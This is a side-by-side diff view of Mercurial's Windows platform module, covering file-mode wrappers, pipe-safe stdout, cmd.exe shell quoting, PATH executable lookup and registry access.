96
98 def writelines(self, *args, **kwargs):
97 def writelines(self, *args, **kwargs):
99 if self._lastop == self.OPREAD:
98 if self._lastop == self.OPREAD:
100 self._noopeseek()
99 self._noopeseek()
101
100
102 object.__setattr__(self, r'_lastop', self.OPWRITE)
101 object.__setattr__(self, r'_lastop', self.OPWRITE)
103 return self._fp.writelines(*args, **kwargs)
102 return self._fp.writelines(*args, **kwargs)
104
103
105 def read(self, *args, **kwargs):
104 def read(self, *args, **kwargs):
106 if self._lastop == self.OPWRITE:
105 if self._lastop == self.OPWRITE:
107 self._noopseek()
106 self._noopseek()
108
107
109 object.__setattr__(self, r'_lastop', self.OPREAD)
108 object.__setattr__(self, r'_lastop', self.OPREAD)
110 return self._fp.read(*args, **kwargs)
109 return self._fp.read(*args, **kwargs)
111
110
112 def readline(self, *args, **kwargs):
111 def readline(self, *args, **kwargs):
113 if self._lastop == self.OPWRITE:
112 if self._lastop == self.OPWRITE:
114 self._noopseek()
113 self._noopseek()
115
114
116 object.__setattr__(self, r'_lastop', self.OPREAD)
115 object.__setattr__(self, r'_lastop', self.OPREAD)
117 return self._fp.readline(*args, **kwargs)
116 return self._fp.readline(*args, **kwargs)
118
117
119 def readlines(self, *args, **kwargs):
118 def readlines(self, *args, **kwargs):
120 if self._lastop == self.OPWRITE:
119 if self._lastop == self.OPWRITE:
121 self._noopseek()
120 self._noopseek()
122
121
123 object.__setattr__(self, r'_lastop', self.OPREAD)
122 object.__setattr__(self, r'_lastop', self.OPREAD)
124 return self._fp.readlines(*args, **kwargs)
123 return self._fp.readlines(*args, **kwargs)
125
124
126 def posixfile(name, mode='r', buffering=-1):
125 def posixfile(name, mode='r', buffering=-1):
127 '''Open a file with even more POSIX-like semantics'''
126 '''Open a file with even more POSIX-like semantics'''
128 try:
127 try:
129 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
128 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
130
129
131 # The position when opening in append mode is implementation defined, so
130 # The position when opening in append mode is implementation defined, so
132 # make it consistent with other platforms, which position at EOF.
131 # make it consistent with other platforms, which position at EOF.
133 if 'a' in mode:
132 if 'a' in mode:
134 fp.seek(0, os.SEEK_END)
133 fp.seek(0, os.SEEK_END)
135
134
136 if '+' in mode:
135 if '+' in mode:
137 return mixedfilemodewrapper(fp)
136 return mixedfilemodewrapper(fp)
138
137
139 return fp
138 return fp
140 except WindowsError as err:
139 except WindowsError as err:
141 # convert to a friendlier exception
140 # convert to a friendlier exception
142 raise IOError(err.errno, '%s: %s' % (
141 raise IOError(err.errno, '%s: %s' % (
143 name, encoding.strtolocal(err.strerror)))
142 name, encoding.strtolocal(err.strerror)))
144
143
145 # may be wrapped by win32mbcs extension
144 # may be wrapped by win32mbcs extension
146 listdir = osutil.listdir
145 listdir = osutil.listdir
147
146
148 class winstdout(object):
147 class winstdout(object):
149 '''stdout on windows misbehaves if sent through a pipe'''
148 '''stdout on windows misbehaves if sent through a pipe'''
150
149
151 def __init__(self, fp):
150 def __init__(self, fp):
152 self.fp = fp
151 self.fp = fp
153
152
154 def __getattr__(self, key):
153 def __getattr__(self, key):
155 return getattr(self.fp, key)
154 return getattr(self.fp, key)
156
155
157 def close(self):
156 def close(self):
158 try:
157 try:
159 self.fp.close()
158 self.fp.close()
160 except IOError:
159 except IOError:
161 pass
160 pass
162
161
163 def write(self, s):
162 def write(self, s):
164 try:
163 try:
165 # This is workaround for "Not enough space" error on
164 # This is workaround for "Not enough space" error on
166 # writing large size of data to console.
165 # writing large size of data to console.
167 limit = 16000
166 limit = 16000
168 l = len(s)
167 l = len(s)
169 start = 0
168 start = 0
170 self.softspace = 0
169 self.softspace = 0
171 while start < l:
170 while start < l:
172 end = start + limit
171 end = start + limit
173 self.fp.write(s[start:end])
172 self.fp.write(s[start:end])
174 start = end
173 start = end
175 except IOError as inst:
174 except IOError as inst:
176 if inst.errno != 0:
175 if inst.errno != 0:
177 raise
176 raise
178 self.close()
177 self.close()
179 raise IOError(errno.EPIPE, 'Broken pipe')
178 raise IOError(errno.EPIPE, 'Broken pipe')
180
179
181 def flush(self):
180 def flush(self):
182 try:
181 try:
183 return self.fp.flush()
182 return self.fp.flush()
184 except IOError as inst:
183 except IOError as inst:
185 if inst.errno != errno.EINVAL:
184 if inst.errno != errno.EINVAL:
186 raise
185 raise
187 raise IOError(errno.EPIPE, 'Broken pipe')
186 raise IOError(errno.EPIPE, 'Broken pipe')
188
187
189 def _is_win_9x():
188 def _is_win_9x():
190 '''return true if run on windows 95, 98 or me.'''
189 '''return true if run on windows 95, 98 or me.'''
191 try:
190 try:
192 return sys.getwindowsversion()[3] == 1
191 return sys.getwindowsversion()[3] == 1
193 except AttributeError:
192 except AttributeError:
194 return 'command' in encoding.environ.get('comspec', '')
193 return 'command' in encoding.environ.get('comspec', '')
195
194
196 def openhardlinks():
195 def openhardlinks():
197 return not _is_win_9x()
196 return not _is_win_9x()
198
197
199 def parsepatchoutput(output_line):
198 def parsepatchoutput(output_line):
200 """parses the output produced by patch and returns the filename"""
199 """parses the output produced by patch and returns the filename"""
201 pf = output_line[14:]
200 pf = output_line[14:]
202 if pf[0] == '`':
201 if pf[0] == '`':
203 pf = pf[1:-1] # Remove the quotes
202 pf = pf[1:-1] # Remove the quotes
204 return pf
203 return pf
205
204
206 def sshargs(sshcmd, host, user, port):
205 def sshargs(sshcmd, host, user, port):
207 '''Build argument list for ssh or Plink'''
206 '''Build argument list for ssh or Plink'''
208 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
207 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
209 args = user and ("%s@%s" % (user, host)) or host
208 args = user and ("%s@%s" % (user, host)) or host
210 if args.startswith('-') or args.startswith('/'):
209 if args.startswith('-') or args.startswith('/'):
211 raise error.Abort(
210 raise error.Abort(
212 _('illegal ssh hostname or username starting with - or /: %s') %
211 _('illegal ssh hostname or username starting with - or /: %s') %
213 args)
212 args)
214 args = shellquote(args)
213 args = shellquote(args)
215 if port:
214 if port:
216 args = '%s %s %s' % (pflag, shellquote(port), args)
215 args = '%s %s %s' % (pflag, shellquote(port), args)
217 return args
216 return args
218
217
219 def setflags(f, l, x):
218 def setflags(f, l, x):
220 pass
219 pass
221
220
222 def copymode(src, dst, mode=None):
221 def copymode(src, dst, mode=None):
223 pass
222 pass
224
223
225 def checkexec(path):
224 def checkexec(path):
226 return False
225 return False
227
226
228 def checklink(path):
227 def checklink(path):
229 return False
228 return False
230
229
231 def setbinary(fd):
230 def setbinary(fd):
232 # When run without console, pipes may expose invalid
231 # When run without console, pipes may expose invalid
233 # fileno(), usually set to -1.
232 # fileno(), usually set to -1.
234 fno = getattr(fd, 'fileno', None)
233 fno = getattr(fd, 'fileno', None)
235 if fno is not None and fno() >= 0:
234 if fno is not None and fno() >= 0:
236 msvcrt.setmode(fno(), os.O_BINARY)
235 msvcrt.setmode(fno(), os.O_BINARY)
237
236
238 def pconvert(path):
237 def pconvert(path):
239 return path.replace(pycompat.ossep, '/')
238 return path.replace(pycompat.ossep, '/')
240
239
241 def localpath(path):
240 def localpath(path):
242 return path.replace('/', '\\')
241 return path.replace('/', '\\')
243
242
244 def normpath(path):
243 def normpath(path):
245 return pconvert(os.path.normpath(path))
244 return pconvert(os.path.normpath(path))
246
245
247 def normcase(path):
246 def normcase(path):
248 return encoding.upper(path) # NTFS compares via upper()
247 return encoding.upper(path) # NTFS compares via upper()
249
248
250 # see posix.py for definitions
249 # see posix.py for definitions
251 normcasespec = encoding.normcasespecs.upper
250 normcasespec = encoding.normcasespecs.upper
252 normcasefallback = encoding.upperfallback
251 normcasefallback = encoding.upperfallback
253
252
254 def samestat(s1, s2):
253 def samestat(s1, s2):
255 return False
254 return False
256
255
257 # A sequence of backslashes is special iff it precedes a double quote:
256 # A sequence of backslashes is special iff it precedes a double quote:
258 # - if there's an even number of backslashes, the double quote is not
257 # - if there's an even number of backslashes, the double quote is not
259 # quoted (i.e. it ends the quoted region)
258 # quoted (i.e. it ends the quoted region)
260 # - if there's an odd number of backslashes, the double quote is quoted
259 # - if there's an odd number of backslashes, the double quote is quoted
261 # - in both cases, every pair of backslashes is unquoted into a single
260 # - in both cases, every pair of backslashes is unquoted into a single
262 # backslash
261 # backslash
263 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
262 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
264 # So, to quote a string, we must surround it in double quotes, double
263 # So, to quote a string, we must surround it in double quotes, double
265 # the number of backslashes that precede double quotes and add another
264 # the number of backslashes that precede double quotes and add another
266 # backslash before every double quote (being careful with the double
265 # backslash before every double quote (being careful with the double
267 # quote we've appended to the end)
266 # quote we've appended to the end)
268 _quotere = None
267 _quotere = None
269 _needsshellquote = None
268 _needsshellquote = None
270 def shellquote(s):
269 def shellquote(s):
271 r"""
270 r"""
272 >>> shellquote(br'C:\Users\xyz')
271 >>> shellquote(br'C:\Users\xyz')
273 '"C:\\Users\\xyz"'
272 '"C:\\Users\\xyz"'
274 >>> shellquote(br'C:\Users\xyz/mixed')
273 >>> shellquote(br'C:\Users\xyz/mixed')
275 '"C:\\Users\\xyz/mixed"'
274 '"C:\\Users\\xyz/mixed"'
276 >>> # Would be safe not to quote too, since it is all double backslashes
275 >>> # Would be safe not to quote too, since it is all double backslashes
277 >>> shellquote(br'C:\\Users\\xyz')
276 >>> shellquote(br'C:\\Users\\xyz')
278 '"C:\\\\Users\\\\xyz"'
277 '"C:\\\\Users\\\\xyz"'
279 >>> # But this must be quoted
278 >>> # But this must be quoted
280 >>> shellquote(br'C:\\Users\\xyz/abc')
279 >>> shellquote(br'C:\\Users\\xyz/abc')
281 '"C:\\\\Users\\\\xyz/abc"'
280 '"C:\\\\Users\\\\xyz/abc"'
282 """
281 """
283 global _quotere
282 global _quotere
284 if _quotere is None:
283 if _quotere is None:
285 _quotere = re.compile(r'(\\*)("|\\$)')
284 _quotere = re.compile(r'(\\*)("|\\$)')
286 global _needsshellquote
285 global _needsshellquote
287 if _needsshellquote is None:
286 if _needsshellquote is None:
288 # ":" is also treated as "safe character", because it is used as a part
287 # ":" is also treated as "safe character", because it is used as a part
289 # of path name on Windows. "\" is also part of a path name, but isn't
288 # of path name on Windows. "\" is also part of a path name, but isn't
290 # safe because shlex.split() (kind of) treats it as an escape char and
289 # safe because shlex.split() (kind of) treats it as an escape char and
291 # drops it. It will leave the next character, even if it is another
290 # drops it. It will leave the next character, even if it is another
292 # "\".
291 # "\".
293 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
292 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
294 if s and not _needsshellquote(s) and not _quotere.search(s):
293 if s and not _needsshellquote(s) and not _quotere.search(s):
295 # "s" shouldn't have to be quoted
294 # "s" shouldn't have to be quoted
296 return s
295 return s
297 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
296 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
298
297
299 def _unquote(s):
298 def _unquote(s):
300 if s.startswith(b'"') and s.endswith(b'"'):
299 if s.startswith(b'"') and s.endswith(b'"'):
301 return s[1:-1]
300 return s[1:-1]
302 return s
301 return s
303
302
304 def shellsplit(s):
303 def shellsplit(s):
305 """Parse a command string in cmd.exe way (best-effort)"""
304 """Parse a command string in cmd.exe way (best-effort)"""
306 return pycompat.maplist(_unquote, pycompat.shlexsplit(s, posix=False))
305 return pycompat.maplist(_unquote, pycompat.shlexsplit(s, posix=False))
307
306
308 def quotecommand(cmd):
307 def quotecommand(cmd):
309 """Build a command string suitable for os.popen* calls."""
308 """Build a command string suitable for os.popen* calls."""
310 if sys.version_info < (2, 7, 1):
309 if sys.version_info < (2, 7, 1):
311 # Python versions since 2.7.1 do this extra quoting themselves
310 # Python versions since 2.7.1 do this extra quoting themselves
312 return '"' + cmd + '"'
311 return '"' + cmd + '"'
313 return cmd
312 return cmd
314
313
315 def popen(command, mode='r'):
314 def popen(command, mode='r'):
316 # Work around "popen spawned process may not write to stdout
315 # Work around "popen spawned process may not write to stdout
317 # under windows"
316 # under windows"
318 # http://bugs.python.org/issue1366
317 # http://bugs.python.org/issue1366
319 command += " 2> %s" % pycompat.bytestr(os.devnull)
318 command += " 2> %s" % pycompat.bytestr(os.devnull)
320 return os.popen(quotecommand(command), mode)
319 return os.popen(quotecommand(command), mode)
321
320
322 def explainexit(code):
321 def explainexit(code):
323 return _("exited with status %d") % code, code
322 return _("exited with status %d") % code, code
324
323
325 # if you change this stub into a real check, please try to implement the
324 # if you change this stub into a real check, please try to implement the
326 # username and groupname functions above, too.
325 # username and groupname functions above, too.
327 def isowner(st):
326 def isowner(st):
328 return True
327 return True
329
328
330 def findexe(command):
329 def findexe(command):
331 '''Find executable for command searching like cmd.exe does.
330 '''Find executable for command searching like cmd.exe does.
332 If command is a basename then PATH is searched for command.
331 If command is a basename then PATH is searched for command.
333 PATH isn't searched if command is an absolute or relative path.
332 PATH isn't searched if command is an absolute or relative path.
334 An extension from PATHEXT is found and added if not present.
333 An extension from PATHEXT is found and added if not present.
335 If command isn't found None is returned.'''
334 If command isn't found None is returned.'''
336 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
335 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
337 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
336 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
338 if os.path.splitext(command)[1].lower() in pathexts:
337 if os.path.splitext(command)[1].lower() in pathexts:
339 pathexts = ['']
338 pathexts = ['']
340
339
341 def findexisting(pathcommand):
340 def findexisting(pathcommand):
342 'Will append extension (if needed) and return existing file'
341 'Will append extension (if needed) and return existing file'
343 for ext in pathexts:
342 for ext in pathexts:
344 executable = pathcommand + ext
343 executable = pathcommand + ext
345 if os.path.exists(executable):
344 if os.path.exists(executable):
346 return executable
345 return executable
347 return None
346 return None
348
347
349 if pycompat.ossep in command:
348 if pycompat.ossep in command:
350 return findexisting(command)
349 return findexisting(command)
351
350
352 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
351 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
353 executable = findexisting(os.path.join(path, command))
352 executable = findexisting(os.path.join(path, command))
354 if executable is not None:
353 if executable is not None:
355 return executable
354 return executable
356 return findexisting(os.path.expanduser(os.path.expandvars(command)))
355 return findexisting(os.path.expanduser(os.path.expandvars(command)))
357
356
358 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
357 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
359
358
360 def statfiles(files):
359 def statfiles(files):
361 '''Stat each file in files. Yield each stat, or None if a file
360 '''Stat each file in files. Yield each stat, or None if a file
362 does not exist or has a type we don't care about.
361 does not exist or has a type we don't care about.
363
362
364 Cluster and cache stat per directory to minimize number of OS stat calls.'''
363 Cluster and cache stat per directory to minimize number of OS stat calls.'''
365 dircache = {} # dirname -> filename -> status | None if file does not exist
364 dircache = {} # dirname -> filename -> status | None if file does not exist
366 getkind = stat.S_IFMT
365 getkind = stat.S_IFMT
367 for nf in files:
366 for nf in files:
368 nf = normcase(nf)
367 nf = normcase(nf)
369 dir, base = os.path.split(nf)
368 dir, base = os.path.split(nf)
370 if not dir:
369 if not dir:
371 dir = '.'
370 dir = '.'
372 cache = dircache.get(dir, None)
371 cache = dircache.get(dir, None)
373 if cache is None:
372 if cache is None:
374 try:
373 try:
375 dmap = dict([(normcase(n), s)
374 dmap = dict([(normcase(n), s)
376 for n, k, s in listdir(dir, True)
375 for n, k, s in listdir(dir, True)
377 if getkind(s.st_mode) in _wantedkinds])
376 if getkind(s.st_mode) in _wantedkinds])
378 except OSError as err:
377 except OSError as err:
379 # Python >= 2.5 returns ENOENT and adds winerror field
378 # Python >= 2.5 returns ENOENT and adds winerror field
380 # EINVAL is raised if dir is not a directory.
379 # EINVAL is raised if dir is not a directory.
381 if err.errno not in (errno.ENOENT, errno.EINVAL,
380 if err.errno not in (errno.ENOENT, errno.EINVAL,
382 errno.ENOTDIR):
381 errno.ENOTDIR):
383 raise
382 raise
384 dmap = {}
383 dmap = {}
385 cache = dircache.setdefault(dir, dmap)
384 cache = dircache.setdefault(dir, dmap)
386 yield cache.get(base, None)
385 yield cache.get(base, None)
387
386
388 def username(uid=None):
387 def username(uid=None):
389 """Return the name of the user with the given uid.
388 """Return the name of the user with the given uid.
390
389
391 If uid is None, return the name of the current user."""
390 If uid is None, return the name of the current user."""
392 return None
391 return None
393
392
394 def groupname(gid=None):
393 def groupname(gid=None):
395 """Return the name of the group with the given gid.
394 """Return the name of the group with the given gid.
396
395
397 If gid is None, return the name of the current group."""
396 If gid is None, return the name of the current group."""
398 return None
397 return None
399
398
400 def removedirs(name):
399 def removedirs(name):
401 """special version of os.removedirs that does not remove symlinked
400 """special version of os.removedirs that does not remove symlinked
402 directories or junction points if they actually contain files"""
401 directories or junction points if they actually contain files"""
403 if listdir(name):
402 if listdir(name):
404 return
403 return
405 os.rmdir(name)
404 os.rmdir(name)
406 head, tail = os.path.split(name)
405 head, tail = os.path.split(name)
407 if not tail:
406 if not tail:
408 head, tail = os.path.split(head)
407 head, tail = os.path.split(head)
409 while head and tail:
408 while head and tail:
410 try:
409 try:
411 if listdir(head):
410 if listdir(head):
412 return
411 return
413 os.rmdir(head)
412 os.rmdir(head)
414 except (ValueError, OSError):
413 except (ValueError, OSError):
415 break
414 break
416 head, tail = os.path.split(head)
415 head, tail = os.path.split(head)
417
416
418 def rename(src, dst):
417 def rename(src, dst):
419 '''atomically rename file src to dst, replacing dst if it exists'''
418 '''atomically rename file src to dst, replacing dst if it exists'''
420 try:
419 try:
421 os.rename(src, dst)
420 os.rename(src, dst)
422 except OSError as e:
421 except OSError as e:
423 if e.errno != errno.EEXIST:
422 if e.errno != errno.EEXIST:
424 raise
423 raise
425 unlink(dst)
424 unlink(dst)
426 os.rename(src, dst)
425 os.rename(src, dst)
427
426
428 def gethgcmd():
427 def gethgcmd():
429 return [sys.executable] + sys.argv[:1]
428 return [sys.executable] + sys.argv[:1]
430
429
431 def groupmembers(name):
430 def groupmembers(name):
432 # Don't support groups on Windows for now
431 # Don't support groups on Windows for now
433 raise KeyError
432 raise KeyError
434
433
435 def isexec(f):
434 def isexec(f):
436 return False
435 return False
437
436
438 class cachestat(object):
437 class cachestat(object):
439 def __init__(self, path):
438 def __init__(self, path):
440 pass
439 pass
441
440
442 def cacheable(self):
441 def cacheable(self):
443 return False
442 return False
444
443
445 def lookupreg(key, valname=None, scope=None):
444 def lookupreg(key, valname=None, scope=None):
446 ''' Look up a key/value name in the Windows registry.
445 ''' Look up a key/value name in the Windows registry.
447
446
448 valname: value name. If unspecified, the default value for the key
447 valname: value name. If unspecified, the default value for the key
449 is used.
448 is used.
450 scope: optionally specify scope for registry lookup, this can be
449 scope: optionally specify scope for registry lookup, this can be
451 a sequence of scopes to look up in order. Default (CURRENT_USER,
450 a sequence of scopes to look up in order. Default (CURRENT_USER,
452 LOCAL_MACHINE).
451 LOCAL_MACHINE).
453 '''
452 '''
454 if scope is None:
453 if scope is None:
455 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
454 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
456 elif not isinstance(scope, (list, tuple)):
455 elif not isinstance(scope, (list, tuple)):
457 scope = (scope,)
456 scope = (scope,)
458 for s in scope:
457 for s in scope:
459 try:
458 try:
460 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
459 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
461 # never let a Unicode string escape into the wild
460 # never let a Unicode string escape into the wild
462 return encoding.unitolocal(val)
461 return encoding.unitolocal(val)
463 except EnvironmentError:
462 except EnvironmentError:
464 pass
463 pass
465
464
466 expandglobs = True
465 expandglobs = True
467
466
468 def statislink(st):
467 def statislink(st):
469 '''check whether a stat result is a symlink'''
468 '''check whether a stat result is a symlink'''
470 return False
469 return False
471
470
472 def statisexec(st):
471 def statisexec(st):
473 '''check whether a stat result is an executable file'''
472 '''check whether a stat result is an executable file'''
474 return False
473 return False
475
474
476 def poll(fds):
475 def poll(fds):
477 # see posix.py for description
476 # see posix.py for description
478 raise NotImplementedError()
477 raise NotImplementedError()
479
478
480 def readpipe(pipe):
479 def readpipe(pipe):
481 """Read all available data from a pipe."""
480 """Read all available data from a pipe."""
482 chunks = []
481 chunks = []
483 while True:
482 while True:
484 size = win32.peekpipe(pipe)
483 size = win32.peekpipe(pipe)
485 if not size:
484 if not size:
486 break
485 break
487
486
488 s = pipe.read(size)
487 s = pipe.read(size)
489 if not s:
488 if not s:
490 break
489 break
491 chunks.append(s)
490 chunks.append(s)
492
491
493 return ''.join(chunks)
492 return ''.join(chunks)
494
493
495 def bindunixsocket(sock, path):
494 def bindunixsocket(sock, path):
496 raise NotImplementedError('unsupported platform')
495 raise NotImplementedError('unsupported platform')
General Comments 0
You need to be logged in to leave comments. Login now